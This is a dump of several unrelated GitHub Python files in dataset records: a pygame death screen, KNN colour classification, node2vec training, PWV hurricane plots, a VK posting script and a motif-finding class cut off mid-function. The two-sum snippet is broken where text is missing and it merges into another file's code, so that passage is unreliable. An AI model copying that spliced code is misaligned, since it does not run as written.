self.death_screen_current_frame = [0,0]\n self.death_messages = [pygame.image.load(\"Images/UI/death_message_1.png\").convert_alpha(),\n pygame.image.load(\"Images/UI/death_message_2.png\").convert_alpha(),\n pygame.image.load(\"Images/UI/death_message_3.png\").convert_alpha(),\n pygame.image.load(\"Images/UI/death_message_4.png\").convert_alpha(),\n pygame.image.load(\"Images/UI/death_message_5.png\").convert_alpha(),\n pygame.image.load(\"Images/UI/death_message_6.png\").convert_alpha(),\n pygame.image.load(\"Images/UI/death_message_7.png\").convert_alpha(),\n pygame.image.load(\"Images/UI/death_message_8.png\").convert_alpha(),\n pygame.image.load(\"Images/UI/death_message_9.png\").convert_alpha(),\n pygame.image.load(\"Images/UI/death_message_10.png\").convert_alpha(),\n ]\n self.current_death_message_index = None\n #Inputs\n self.mouse_pos = None\n self.left_click_down = None\n self.controller = False\n self.shooting_key = None\n self.controller_trigger_held = False\n #Pointer\n self.pointer_animation = [[pygame.image.load(\"Images/Player/pointer_1.png\").convert_alpha(),5],\n [pygame.image.load(\"Images/Player/pointer_2.png\").convert_alpha(),5],\n [pygame.image.load(\"Images/Player/pointer_3.png\").convert_alpha(),5],\n ] \n self.pointer_rect = self.pointer_animation[0][0].get_rect() #Just for centering it\n self.pointer_current_frame = [0,0]\n def update(self,game_state_manager,input_dict):\n #Unlock mouse from screen\n pygame.event.set_grab(False)\n #Update buttons\n self.mouse_pos = input_dict[\"mouse_pos\"]\n self.left_click_down = input_dict[\"left_click_down\"]\n self.controller = input_dict[\"controller\"]\n if self.controller:\n #Have to do this shenagians because no keydown for controller triggers\n self.shooting_key = False\n if not input_dict[\"shooting_key\"] and self.controller_trigger_held:\n print(\"TRUE\")\n self.controller_trigger_held = False\n if input_dict[\"shooting_key\"] and not self.controller_trigger_held:\n self.shooting_key = True\n if self.left_click_down or (self.controller and self.shooting_key):\n game_state_manager.state = game_state_manager.states[\"Reset Level\"]\n pygame.event.set_grab(True)\n self.just_died = True\n def draw(self,screen):\n if self.just_died:\n self.background_image = screen.convert()\n self.background_image.fill((50,50,50,10), special_flags=pygame.BLEND_ADD)\n self.current_death_message_index = random.randint(0,len(self.death_messages)-1)\n self.just_died = False\n self.death_screen_current_frame = animation(self.death_screen_animation,self.death_screen_current_frame)\n screen.blit(self.background_image,(0,0))\n screen.blit(self.death_screen_animation[self.death_screen_current_frame[0]][0],(0,0))\n screen.blit(self.death_messages[self.current_death_message_index],(260,440))\n #Mouse\n if self.mouse_pos:\n self.pointer_rect.centerx = self.mouse_pos[0]\n self.pointer_rect.centery = self.mouse_pos[1]\n self.pointer_current_frame = animation(self.pointer_animation,self.pointer_current_frame)\n screen.blit(self.pointer_animation[self.pointer_current_frame[0]][0],(self.pointer_rect.x,self.pointer_rect.y))\n \n\n","repo_name":"kadable/PROJECT-TRUNK-Public","sub_path":"Other_Files/Death_Screen.py","file_name":"Death_Screen.py","file_ext":"py","file_size_in_byte":4264,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"958512339","text":"\"\"\"\n给定一个整数数组 nums 和一个目标值 target,请你在该数组中找出和为目标值的那 两个 整数,并返回他们的数组下标。\n\"\"\"\n\nclass Solution:\n # 两次循环\n def twoSum(self, nums, target):\n size = len(nums)\n for i,num in enumerate(nums):\n j = i+1\n while jlist:\n try:\n img=cv.resize(img,(30,30),interpolation=cv.INTER_CUBIC)\n img=img[7:23,7:23]\n img=cv.resize(img,(30,30),interpolation=cv.INTER_CUBIC)\n except Exception as Error:\n print(Error)\n return None\n #img= cv.GaussianBlur(img,(3,3),0)\n #img= cv.GaussianBlur(img,(15,15),0)\n # lower_green = np.array([35, 43, 46])\n # upper_green = np.array([78, 255, 255])\n \n # maskgreen = cv2.inRange(img, lower_green, upper_green)\n # masknotgreen = cv2.bitwise_not(maskgreen)\n # img= cv2.bitwise_and(img, img, mask=masknotgreen)\n # N=img.shape[0]*img.shape[1]\n\n #img=cv.cvtColor(img,cv.COLOR_RGB2HSV)\n img1=cv.cvtColor(img,cv.COLOR_RGB2HSV)\n #img2=cv.cvtColor(img,cv.COLOR_RGBA2GRAY)\n\n #hist=ColorCluster(img)\n #cv.imshow(\"F\",img)\n #cv.waitKey(0)&0xFF\n #m=np.sum(img)/(img.shape[0]*img.shape[1])\n H,S,V=cv.split(img)\n mask1=H-S\n mask2=S-V\n mask2[mask2!=0]=1\n # mask1[mask1!=0]=1\n # mask2[mask2!=0]=1\n mask2[mask1!=0]=1\n img[mask2==0]=0\n hist1 = cv.calcHist([img], [0], None, [10], [0.0,255.0])\n hist2 = cv.calcHist([img], [1], None, [10], [0.0,255.0])\n hist3 = cv.calcHist([img], [2], None, [10], [0.0,255.0])\n hist4 = cv.calcHist([img1],[0], None, [25], [0.0,255.0])\n hist5 = cv.calcHist([img1],[1], None, [25], [0.0,255.0])\n hist6 = cv.calcHist([img1],[2], None, [25], [0.0,255.0])\n #histg = cv.calcHist([img2],[0], None, [100], [0.0,255.0])\n hist=np.concatenate((hist1,hist2,hist3,hist4,hist5,hist6),axis=0)\n #print(hist.tolist())\n #muH=hist[0]\n #muS=hist[1]\n #muV=hist[2]\n #img[mask2==0]=0\n # H,S,V=cv.split(img)\n # N=img.shape[0]*img.shape[1]\n # muH=np.sum(H)\n # # H[H!=0]=1\n # # N=np.sum(H)+1\n # muH=muH/N\n # muS=np.sum(S)/N\n # muV=np.sum(V)/N\n \n return hist#[muH,muS,muV]#[m,m,m]#\n # H,S,V,N=0,0,0,1\n\n # for i in range(img.shape[0]):\n # for j in range(img.shape[1]):\n # if img[i][j][0]==img[i][j][1] and img[i][j][1]==img[i][j][2]:\n # continue\n # else:\n # H=H+img[i][j][0]\n # S=S+img[i][j][1]\n # V=V+img[i][j][2]\n # N=N+1\n # return [H/N,S/N,V/N]\n\n# def main_color_moment(img):\n# \"\"\"\n# 提取图片的颜色HSV特征\n# \"\"\"\n# try:\n# img=cv.resize(img,(20,20),interpolation=cv.INTER_CUBIC)\n# except Exception as Error:\n# print(Error)\n# return None\n# #img= cv2.GaussianBlur(img,(3,3),0)\n# #img= cv2.GaussianBlur(img,(15,15),0)\n# # lower_green = np.array([35, 43, 46])\n# # upper_green = np.array([78, 255, 255])\n \n# # maskgreen = cv2.inRange(img, lower_green, upper_green)\n# # masknotgreen = cv2.bitwise_not(maskgreen)\n# # img= cv2.bitwise_and(img, img, mask=masknotgreen)\n# # N=img.shape[0]*img.shape[1]\n\n# img=cv.cvtColor(img,cv.COLOR_RGB2HSV)\n# #img=cv2.cvtColor(img,cv2.COLOR_RGBA2GRAY)\n\n# img=ColorCluster(img)\n# #m=np.sum(img)/(img.shape[0]*img.shape[1])\n# H,S,V=cv.split(img)\n# mask1=H-S\n# mask2=S-V\n# # mask1[mask1!=0]=1\n# # mask2[mask2!=0]=1\n# mask2[mask1!=0]=1\n# img[mask2==0]=0\n# H,S,V=cv.split(img)\n# muH=np.sum(H)\n# H[H!=0]=1\n# N=np.sum(H)+1\n# muH=muH/N\n# muS=np.sum(S)/N\n# muV=np.sum(V)/N\n# return [muH,muS,muV]#[m,m,m]#\n# # H,S,V,N=0,0,0,1\n\n# # for i in range(img.shape[0]):\n# # for j in range(img.shape[1]):\n# # if img[i][j][0]==img[i][j][1] and img[i][j][1]==img[i][j][2]:\n# # continue\n# # else:\n# # H=H+img[i][j][0]\n# # S=S+img[i][j][1]\n# # V=V+img[i][j][2]\n# # N=N+1\n# # return [H/N,S/N,V/N]\n\n\ndef init_KNN(path=online_data_save_path):\n KNN=KNNClassifier(modelpath=online_data_save_path)\n return KNN\n\n\n# def judge_by_knn(img,KNN):\n# #m=main_color_moment(img)\n# KNN.prediction(img,KNN)\n \n\n\ndef init_center(path=None):\n centerpoint={}\n for i in os.listdir(path):\n if i!=\".DS_Store\":\n N,H,S,V=0,0,0,0\n for j in os.listdir(os.path.join(path,i)):\n if j!=\".DS_Store\":\n N+=1\n img=cv.imread(os.path.join(path,i,j))\n m=main_color_moment(img)\n #print(m)\n H=H+m[0]\n S=S+m[1]\n V=V+m[2]\n #print(m)\n centerpoint[i]=[H/N,S/N,V/N]\n return centerpoint\n\ndef color_classify(frame,box,centerpoint):\n img=frame[box[1]:box[1]+box[3],box[0]:box[0]+box[2]]\n return judge(centerpoint,img)\n\n\ndef judge(centerpoint,img):\n #cv2.imshow(\"uuu\",ColorCluster(img))\n #cv2.waitKey(0)&0xFF\n m=main_color_moment(img)\n #destence={}\n mind=255*255\n keymin=0\n for key,i in centerpoint.items():\n destence=(i[0]-m[0])**2+(i[1]-m[1])**2+(i[2]-m[2])**2\n if mind>destence:\n mind=destence\n keymin=key\n return keymin\n\ndef test(test_path,centerpoint):\n fps=[]\n acc={}\n for i in os.listdir(test_path):\n if i!=\".DS_Store\":\n count=0\n wrong=0\n for j in os.listdir(os.path.join(test_path,i)):\n if j!=\".DS_Store\":\n img=cv.imread(os.path.join(test_path,i,j))\n stime=time.time()\n fact=judge(centerpoint,img)\n endtime=time.time()\n fps.append(1/(endtime-stime))\n if fact!=i:\n wrong+=1\n count+=1\n acc[i]=(count-wrong)/count\n print(\"fps={0:4>.2f}\".format(sum(fps)/len(fps)))\n return acc\n\ndef get_best_center(centerpoint,data_path):\n #best_center=[]\n err=500\n loss_now=0\n loss_last=0\n count=1\n try_centerpoint=centerpoint\n while loss_now<3:\n loss_now=0\n for key,value in try_centerpoint.items():\n value[0]+=random.choice([-1,1])*random.random()*1/count\n value[1]+=random.choice([-1,1])*random.random()*1/count\n value[2]+=random.choice([-1,1])*random.random()*1/count\n try_centerpoint[key]=value\n for i in os.listdir(data_path):\n if i!=\".DS_Store\":\n right=0\n num=0\n for j in os.listdir(os.path.join(data_path,i)):\n if j!=\".DS_Store\":\n img=cv.imread(os.path.join(data_path,i,j))\n fact=judge(try_centerpoint,img)\n if fact==i:\n right+=1\n num+=1\n loss_now+=right/num\n #loss_now+=(try_centerpoint[i][0]-m[0])**2+(try_centerpoint[i][1]-m[1])**2+(try_centerpoint[i][2]-m[2])**2\n err=loss_last-loss_now\n print(loss_last,loss_now)\n if err>0:\n try_centerpoint=centerpoint\n err=abs(err)+1\n else:\n loss_last=loss_now\n centerpoint=try_centerpoint\n err=abs(err)\n count+=1\n if count>1000:\n break\n if count%10==0:\n print(centerpoint)\n return centerpoint\n\nif __name__ == '__main__':\n img=cv.imread('/home/wxyice/Desktop/srtp/srtp_code/color_data/other/C/13.jpg')\n print(img.shape)\n\n KKK=KNNClassifier()\n print(KKK.prediction(img))\n","repo_name":"chenzhike110/yolov4_siamfcpp_multitracking","sub_path":"knnmodel.py","file_name":"knnmodel.py","file_ext":"py","file_size_in_byte":12176,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"32"} +{"seq_id":"74860029212","text":"import os\nimport sys\n\nimport torch\nimport networkx as nx\nimport matplotlib.pyplot as plt\n\nfrom sklearn.manifold import TSNE\nfrom torch_geometric.nn import Node2Vec\nfrom torch_geometric.utils.convert import (\n from_scipy_sparse_matrix\n)\n\ndef train(model, optimizer, loader, device='mps'):\n model.train()\n total_loss = 0\n for pos_rw, neg_rw in loader:\n optimizer.zero_grad()\n loss = model.loss(pos_rw.to(device), neg_rw.to(device))\n loss.backward()\n optimizer.step()\n total_loss += loss.item()\n return total_loss / len(loader)\n\ndef main():\n # device = 'cuda' if torch.cuda.is_available() else 'cpu'\n device = \"cpu\"\n for folder in sorted(os.listdir('data'), key=lambda x: int(x)):\n print(f\"Processing pathway #{folder}...\")\n fpath = os.path.join('data', folder, f'{folder}.edges')\n G = nx.read_edgelist(fpath)\n adj = nx.adjacency_matrix(G)\n # adj = dense_to_sparse(adj)\n edge_index, attr = from_scipy_sparse_matrix(adj)\n model = Node2Vec(\n edge_index,\n embedding_dim=100,\n walk_length=20,\n context_size=10,\n walks_per_node=10,\n num_negative_samples=1,\n p=1,\n q=1,\n sparse=True,\n ).to(device)\n\n # num_workers = 0 if sys.platform.startswith('win') else 4\n num_workers = 4\n loader = model.loader(batch_size=128, shuffle=True, num_workers=4)\n optimizer = torch.optim.SparseAdam(list(model.parameters()), lr=0.01)\n\n for epoch in range(1, 101):\n loss = train(model, optimizer, loader, device=device)\n print(f'Epoch: {epoch:03d}, Loss: {loss:.4f}')\n\n torch.save(model.embedding, f'pathbank/node2vec/{folder}.pt')\n\n\n # @torch.no_grad()\n # def test():\n # model.eval()\n # z = model()\n # acc = model.test(z[data.train_mask], data.y[data.train_mask],\n # z[data.test_mask], data.y[data.test_mask],\n # max_iter=150)\n # return acc\n\n\n # @torch.no_grad()\n # def plot_points(colors):\n # model.eval()\n # z = model(torch.arange(data.num_nodes, device=device))\n # z = TSNE(n_components=2).fit_transform(z.cpu().numpy())\n # y = data.y.cpu().numpy()\n\n # plt.figure(figsize=(8, 8))\n # for i in range(dataset.num_classes):\n # plt.scatter(z[y == i, 0], z[y == i, 1], s=20, color=colors[i])\n # plt.axis('off')\n # plt.show()\n\n # colors = [\n # '#ffc0cb', '#bada55', '#008080', '#420420', '#7fe5f0', '#065535',\n # '#ffd700'\n # ]\n # plot_points(colors)\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"mcneela/Mixed-Curvature-Pathways","sub_path":"pathbank/run_node2vec.py","file_name":"run_node2vec.py","file_ext":"py","file_size_in_byte":2714,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"40004220023","text":"modules_to_test = ['test_pypipegraph', 'test_plotjobs']\n\nimport os\nos.environ['PYPIPEGRAPH_DO_COVERAGE'] = '/code/pypipegraph/pypipegraph/tests/.coveragerc'\nimport coverage\nwith open(\".coveragerc\",'wb') as op:\n op.write(b\"\"\"\n[run]\ndata_file = /code/pypipegraph/pypipegraph/tests/.coverageX\nparallel=True\n[report]\ninclude = *pypipegraph*\n \"\"\") \n\n\ncov = coverage.coverage(source = [os.path.abspath('../')], config_file = '.coveragerc', data_suffix=True)\ncov.start()\n\nimport unittest\nimport nose\nimport noseprogressive\nimport sys\nsys.path.append('/code/pypipegraph/')\nimport pypipegraph as ppg\n\ntry:\n nose.core.runmodule(modules_to_test, argv=sys.argv + ['--with-progressive', \n '--nologcapture'\n ], exit=False) #log capture get's a ton of output from the pipegraph... enable if you need it\nexcept Exception as e:\n print ('error')\n print (e)\n pass\ncov.stop()\ncov.save()\nos.system('coverage combine')\nos.system('coverage html -d covhtml')\nprint ('coverage report is in covhtml/index.html')\n","repo_name":"gitter-badger/pypipegraph","sub_path":"pypipegraph/tests/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"} +{"seq_id":"33323349468","text":"from MyDB import MyDB\nimport pymysql\n\nclass MySQLDB(MyDB):\n\n def __init__(self, h, p, d, u, pwd):\n MyDB.__init__(self, h, p, d, u, pwd)\n\n def getConnectionString(self):\n return {\n 'user': self.user,\n 'passwd': self.pswd,\n 'host': self.host,\n 'db': self.db,\n }\n\n def connect(self):\n config = self.getConnectionString()\n try:\n self.cnx = pymysql.connect(**config)\n except pymysql.Error as err:\n print(err)\n else:\n return True\n\n return False\n","repo_name":"uridanan/MyDataReader","sub_path":"MySQLDB.py","file_name":"MySQLDB.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"73808612892","text":"'''\nThis example show a typical design of a class. For full details look at the accompanying Jupyter Notebook\n'''\nprint()\n#test\n\nclass Point: # this is the same as Point(object)\n '''\n put documentation in here\n '''\n def __init__(self, name, x0 = 0, y0 = 0):\n '''\n put documentation in here\n '''\n self.name = name\n self.x = x0\n self.y = y0\n \n def moveBy(self, dx, dy):\n self.x += dx\n self.y += dy\n \n def display(self):\n print(\"Point {} is at ({},{})\".format(self.name, self.x, self.y))\n \n# create objects\nq = Point('origin')\np1 = Point('point-1', 100, 200)\np2 = Point('point-2', 200, 300)\np3 = Point('point-3', 300, 500)\nprint(Point.__dict__)\nprint(Point.__bases__)\nprint(p1.__dict__)\nprint(p1.__class__)\np1.moveBy(1, 1)\np2.moveBy(2, 3)\np3.moveBy(3, 6)\n\np1.display()\np2.display()\np3.display()\n\n\n","repo_name":"zaeemnajeeb/Python_training_diamond","sub_path":"src/07 Classes and Objects/01.simple_class.py","file_name":"01.simple_class.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"22473791389","text":"import matplotlib.pyplot as plt\nimport re\nfrom itertools import islice\nimport numpy as np\nimport os\nfrom Hurricane import Hurricane\n\n\ndef pw_and_error_plot(site_globel, site_a, pwv_info_path, pwv_err_info_path):\n '''\n 绘制pw的时间序列图和pw error的时间序列图\n :param site_a: 需要绘图的site\n :param pwv_info_path:\n :param pwv_err_info_path:\n :return: None\n '''\n plt.figure(figsize=(500,500))\n pw, pwerr = [],[]\n with open(pwv_info_path, 'r') as f:\n for line in islice(f, 0, None):\n pw.append(re.split(',', line)[1:-1])\n with open(pwv_err_info_path, 'r') as f:\n for line in islice(f, 0, None):\n pwerr.append(re.split(',', line)[1:-1])\n pw = np.array(pw, dtype=float)\n pwerr = np.array(pwerr, dtype=float)\n index_a = [int(i[4]) for i in site_a]\n pw_a = pw[index_a][:]\n pwerr_a = pwerr[index_a][:]\n x = [i for i in range(np.shape(pw_a)[1])]\n legend = []\n for i in range(np.shape(pw_a)[0]):\n plt.scatter(x, pw_a[i][:], marker='.')\n legend.append(site_globel[index_a[i]][3])\n plt.title(\"2020 205-208 Hurricane HANNA PWV time series\")\n plt.xlabel(\"time(interval:30min)\")\n plt.ylabel(\"PW(mm)\")\n plt.legend(legend, fontsize=5, loc='best')\n plt.show()\n\n return 0\n\ndef series_site_pwv_plot(h:Hurricane, sitenames:list):\n pw, pwerr = [], []\n with open(h.pwv_path + \"sitepwvtimeordered.txt\", 'r') as f:\n for line in islice(f, 0, None):\n pw.append(re.split(',', line)[1:-1])\n with open(h.pwv_path + \"sitepwverrtimeordered.txt\", 'r') as f:\n for line in islice(f, 0, None):\n pwerr.append(re.split(',', line)[1:-1])\n pw = np.array(pw, dtype=float)\n # pwerr = np.array(pwerr, dtype=float)\n index_a = [int(i[4]) for i in h.site_a]\n pw_a = pw[index_a][:]\n # pwerr_a = pwerr[index_a][:]\n x0 = np.array([i for i in range(np.shape(pw_a)[1])])\n x = x0.reshape((1,len(x0)))\n\n # 画site的pwv时间序列图\n plt.figure(figsize=(6, 12))\n i = 1\n colors = ['r', 'g' ,'b', 'y', 'm', 'r']\n for each in sitenames:# TODO - 2021 04 11 待修改\n plt.subplot(len(sitenames),1,i)\n index = np.where(h.site_a==each)[0]\n if len(index)==0:\n print(each + ' 找不到!\\n')\n plt.scatter(x, pw_a[index][:], marker='.', s=10,color = 'b', label = each)\n if i != len(sitenames):\n plt.xticks([])\n else:\n doy = [str(dd) for dd in range(h.duration[0]-1, h.duration[1])]\n ll = [i * 2 * 24 for i in range(len(doy))]\n plt.xticks(ll, doy)\n plt.xlim((0*48, 6*48))\n plt.ylim((10, 65))\n plt.legend(loc = 'upper right')\n i = i+1\n\n # plt.title(str(h.year) + \" \" + str(h.duration[0]) + \"-\" + str(\n # h.duration[1]) + \" Hurricane \" + h.name + \" PWV time series ()\")\n # plt.xlabel(\"time(interval:30min)\")\n # plt.ylabel(\"PW(mm)\")\n # plt.legend(legend, fontsize=5, loc='best')\n plt.savefig(h.pc_dir + 'plot\\\\' + \"PW of series (selected) sites.png\", dpi=500)\n\n\ndef single_site_pwv_plot(h:Hurricane):\n '''\n 单独画每个测站的图\n :param h: 飓风类\n :return:\n '''\n path = h.pc_dir+'single_site_pwv_plot\\\\'\n if not os.path.exists(path):\n os.makedirs(path)\n\n pw, pwerr = [], []\n with open(h.pwv_path + \"sitepwvtimeordered.txt\", 'r') as f:\n for line in islice(f, 0, None):\n pw.append(re.split(',', line)[1:-1])\n with open(h.pwv_path + \"sitepwverrtimeordered.txt\", 'r') as f:\n for line in islice(f, 0, None):\n pwerr.append(re.split(',', line)[1:-1])\n pw = np.array(pw, dtype=float)\n # pwerr = np.array(pwerr, dtype=float)\n index_a = [int(i[4]) for i in h.site_a]\n pw_a = pw[index_a][:]\n # pwerr_a = pwerr[index_a][:]\n x0 = np.array([i for i in range(np.shape(pw_a)[1])])\n x = x0.reshape((1, len(x0)))\n\n doy = [str(dd) for dd in range(h.duration[0] - 1, h.duration[1])]\n ll = [i * 2 * 24 for i in range(len(doy))]\n sites = h.site_qc1[0]\n for i in range(np.shape(sites)[0]):\n each = sites[i][3]\n plt.figure()\n index = np.where(h.site_a == each)[0]\n plt.scatter(x, pw_a[index][:], marker='.', s=20, color='b')\n plt.xticks(ll, doy)\n plt.xlim((0 * 48, len(doy) * 48))\n plt.ylim((10, 70))\n plt.title(each+\" PWV \")\n plt.savefig(path+each+\"_pwv.png\", dpi=500)\n","repo_name":"Withoutwaxwqy/atomsphere_data_process","sub_path":"pw_plot.py","file_name":"pw_plot.py","file_ext":"py","file_size_in_byte":4447,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"5716718749","text":"# -*- coding: utf-8 -*-\n# @Time : 2021/7/31 18:44 下午\n# @Author : HanChen\n# @File : 6_7.py\n# @Software: Sublime Text\n\n# ------------------ example01 ------------------\n\"\"\"\n6-7 人:在为完成练习 6-1 而编写的程序中,再创建两个表示人的字典,然后将这三个字典都存储在一个名为 people 的列表中。遍历这个列表,将其中每个人的所有信息都打印出来。\n\"\"\"\npeople = []\n\nperson = {\n 'first_name': 'San', \n 'last_name': 'Zhang', \n 'age': 18, \n 'city': 'BeiJing',\n }\n\npeople.append(person)\n\nperson = {\n 'first_name': 'Si', \n 'last_name': 'Li', \n 'age': 20, \n 'city': 'BeiJing',\n }\n\npeople.append(person)\n\nperson = {\n 'first_name': 'Wu', \n 'last_name': 'Wang', \n 'age': 17, \n 'city': 'BeiJing',\n }\n \npeople.append(person)\n\nfor person in people:\n name = person['first_name'].title() + \" \" + person['last_name'].title()\n age = str(person['age'])\n city = person['city'].title()\n\n print(name + \", of \" + city + \", is \" + age + \" years old.\")\n# ------------------ example01 ------------------\n","repo_name":"HanChen1988/PythonStudy","sub_path":"Book/BookNo001/Chapter_06/python_work/6_7.py","file_name":"6_7.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4872158189","text":"from Classes.vk.Post import Post\nimport time\nfrom datetime import datetime, timedelta, date\nimport pytz\nimport constants\nfrom Classes.vk.Comment import Comment\n\n\ndef createPostDates(hours):\n result = []\n for hour in hours:\n dt = (datetime.combine(date.today(), datetime.min.time()) + timedelta(days=1, hours=hour)).replace(\n tzinfo=pytz.timezone('Europe/Moscow'))\n result.append(\n int(time.mktime(dt.timetuple()))\n )\n return result\n\ndef main():\n # dt = datetime.now()\n # dt_st = dt - timedelta(days=dt.weekday())\n # start_time = int(time.mktime(dt_st.timetuple()))\n # dt_end = dt_st + timedelta(days=6)\n # end_time = int(time.mktime(dt_end.timetuple()))\n\n start_time = int(time.mktime(date(2020, 7, 1).timetuple()))\n end_time = int(time.mktime(date(2020, 7, 5).timetuple()))\n\n comment = Comment(start_time, end_time)\n print(comment.getStats())\n\n if constants.DAYS_LEFT <= 1:\n hour_st = 8\n hour_end = 23\n silent = 3\n\n dates = createPostDates(range(hour_st, hour_end, silent))\n post = Post()\n print(post.post(dates))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"koliankolin/public_vk","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"23907981025","text":"from MySeq import MySeq\nfrom MyMotifs import MyMotifs\n\nclass MotifFinding:\n\n def __init__(self, size=8, seqs=None):\n self.motifSize = size\n if seqs is not None:\n self.seqs = seqs\n self.alphabet = seqs[0].alfabeto()\n else:\n self.seqs = []\n\n def __len__(self):\n return len(self.seqs)\n\n def __getitem__(self, n):\n return self.seqs[n]\n\n def seqSize(self, i):\n return len(self.seqs[i])\n\n def readFile(self, fic, t):\n for s in open(fic, \"r\"):\n self.seqs.append(MySeq(s.strip().upper(), t))\n self.alphabet = self.seqs[0].alfabeto()\n\n def createMotifFromIndexes(self, indexes):\n pseqs = []\n for i, ind in enumerate(indexes):\n pseqs.append(MySeq(self.seqs[i][ind:(ind + self.motifSize)], self.seqs[i].tipo))\n return MyMotifs(pseqs)\n\n # SCORES\n\n def score(self, s):\n score = 0\n motif = self.createMotifFromIndexes(s)\n motif.doCounts()\n mat = motif.counts\n for j in range(len(mat[0])):\n maxcol = mat[0][j]\n for i in range(1, len(mat)):\n if mat[i][j] > maxcol:\n maxcol = mat[i][j]\n score += maxcol\n return score\n\n def score_pseudo(self, s):\n score = 0\n motif = self.createMotifFromIndexes(s)\n motif.doCounts()\n mat = motif.counts\n mat = [[mat[lin][col] + 1 for col in range(len(mat[0]))] for lin in range(len(mat))]\n for j in range(len(mat[0])):\n maxcol = mat[0][j]\n for i in range(1, len(mat)):\n if mat[i][j] > maxcol:\n maxcol = mat[i][j]\n score += maxcol\n return score\n\n def scoreMult(self, s, no_new_pwm=[]):\n score = 1.0\n motif = self.createMotifFromIndexes(s)\n if no_new_pwm == []:\n motif.createPWM()\n mat = motif.pwm\n else:\n mat = no_new_pwm\n for j in range(len(mat[0])):\n maxcol = mat[0][j]\n for i in range(1, len(mat)):\n if mat[i][j] > maxcol:\n maxcol = mat[i][j]\n score *= maxcol\n return score\n\n # EXHAUSTIVE SEARCH\n\n def nextSol(self, s):\n nextS = [0] * len(s)\n pos = len(s) - 1\n while pos >= 0 and s[pos] == self.seqSize(pos) - self.motifSize:\n pos -= 1\n if pos < 0:\n nextS = None\n else:\n for i in range(pos):\n nextS[i] = s[i]\n nextS[pos] = s[pos] + 1\n for i in range(pos + 1, len(s)):\n nextS[i] = 0\n return nextS\n\n def exhaustiveSearch(self):\n melhorScore = -1\n res = []\n s = [0] * len(self.seqs)\n while s is not None:\n sc = self.score(s)\n if sc > melhorScore:\n melhorScore = sc\n res = s\n s = self.nextSol(s)\n return res\n\n # BRANCH AND BOUND \n\n def nextVertex(self, s):\n res = []\n if len(s) < len(self.seqs): # internal node -> down one level\n for i in range(len(s)):\n res.append(s[i])\n res.append(0)\n else: # bypass\n pos = len(s) - 1\n while pos >= 0 and s[pos] == self.seqSize(pos) - self.motifSize:\n pos -= 1\n if pos < 0:\n res = None # last solution\n else:\n for i in range(pos): res.append(s[i])\n res.append(s[pos] + 1)\n return res\n\n def bypass(self, s):\n res = []\n pos = len(s) - 1\n while pos >= 0 and s[pos] == self.seqSize(pos) - self.motifSize:\n pos -= 1\n if pos < 0:\n res = None\n else:\n for i in range(pos): res.append(s[i])\n res.append(s[pos] + 1)\n return res\n\n def branchAndBound(self):\n melhorScore = -1\n melhorMotif = None\n size = len(self.seqs)\n s = [0] * size\n while s is not None:\n if len(s) < size:\n optimScore = self.score(s) + (size - len(s)) * self.motifSize\n if optimScore < melhorScore:\n s = self.bypass(s)\n else:\n s = self.nextVertex(s)\n else:\n sc = self.score(s)\n if sc > melhorScore:\n melhorScore = sc\n melhorMotif = s\n s = self.nextVertex(s)\n return melhorMotif\n\n # Consensus (heuristic)\n\n def heuristicConsensus(self):\n mf = MotifFinding(self.motifSize, self.seqs[:2])\n s = mf.exhaustiveSearch()\n for i in range(2, len(self.seqs)):\n s.append(0)\n melhorScore = -1\n melhorPosicao = 0\n for j in range(self.seqSize(i) - self.motifSize + 1):\n s[i] = j\n score_atual = self.score(s)\n if score_atual > melhorScore:\n melhorScore = score_atual\n melhorPosicao = j\n s[i] = melhorPosicao\n return s\n\n # Consensus (heuristic)\n\n def heuristicStochastic(self):\n from random import randint\n s = [0] * len(self.seqs)\n for i in range(len(self.seqs)):\n s[i] = randint(0, self.seqSize(i) - self.motifSize)\n\n best_score = self.score(s)\n improve = True\n while improve:\n motif = self.createMotifFromIndexes(s)\n motif.createPWM()\n for i in range(len(self.seqs)):\n s[i] = motif.mostProbableSeq(self.seqs[i])\n scr = self.score(s)\n if scr > best_score:\n best_score = scr\n else:\n improve = False\n return s\n\n def heuristicStochastic_ex(self):\n from random import randint\n s = [0] * len(self.seqs)\n for i in range(len(self.seqs)):\n s[i] = randint(0, self.seqSize(i) - self.motifSize)\n\n best_score = self.score_pseudo(s)\n improve = True\n while improve:\n motif = self.createMotifFromIndexes(s)\n motif.createPWM()\n motif.pwm = [[motif.pwm[lin][col] + 0.1 for col in range(len(motif.pwm[0]))] for lin in range(len(motif.pwm))]\n for i in range(len(self.seqs)):\n s[i] = motif.mostProbableSeq(self.seqs[i])\n scr = self.score_pseudo(s)\n if scr > best_score:\n best_score = scr\n else:\n improve = False\n return s\n\n # Gibbs sampling \n\n def gibbs(self, iterations=1000):\n from random import randint\n s = [randint(0, len(self.seqs[i]) - self.motifSize - 1) for i in range(len(self.seqs))]\n best_score = self.score(s)\n bests = list(s)\n for it in range(iterations):\n seq_index = randint(0, len(self.seqs) - 1)\n seq = self.seqs[seq_index]\n s.pop(seq_index)\n removed = self.seqs.pop(seq_index)\n motif = self.createMotifFromIndexes(s)\n motif.createPWM()\n self.seqs.insert(seq_index, removed)\n r = motif.probAllPositions(seq)\n pos = self.roulette(r)\n s.insert(seq_index, pos)\n score = self.score(s)\n if score > best_score:\n best_score = score\n bests = list(s)\n return bests\n\n def gibbs_ex(self, iterations=1000):\n from random import randint\n s = [randint(0, len(self.seqs[i]) - self.motifSize - 1) for i in 